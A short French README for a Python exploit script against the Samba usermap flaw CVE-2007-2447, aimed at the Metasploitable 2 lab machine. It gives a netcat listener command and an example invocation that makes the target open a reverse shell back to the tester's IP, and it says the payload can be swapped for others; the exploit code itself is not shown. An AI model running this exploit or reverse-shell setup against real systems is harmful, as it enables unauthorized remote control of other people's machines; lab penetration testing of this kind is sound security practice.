
Script Python d'exploitation pour CVE-2007-2447 (Samba usermap) qui livre un shell inversé avec des charges utiles personnalisables, conçu pour les tests de pénétration sur des cibles vulnérables comme Metasploitable 2.
Pour tester le script, je vous recommande la machine virtuelle « metasploitable 2 » disponible ici. Le script affichera un reverse shell si l'exploit fonctionne. Pour obtenir la connexion, ouvrez simplement une session netcat comme suit :
netcat -lnvp <port>
py CVE-2007-2447.py 192.168.1.38 1337 192.168.1.14
et sur mon netcat :
netcat -lnvp 1337
Résultat :
netcat :
alt text
et sur le script :
alt text
J'ai utilisé un payload d'une antisèche. Le lien est disponible ici. Vous pouvez le remplacer par d'autres payloads.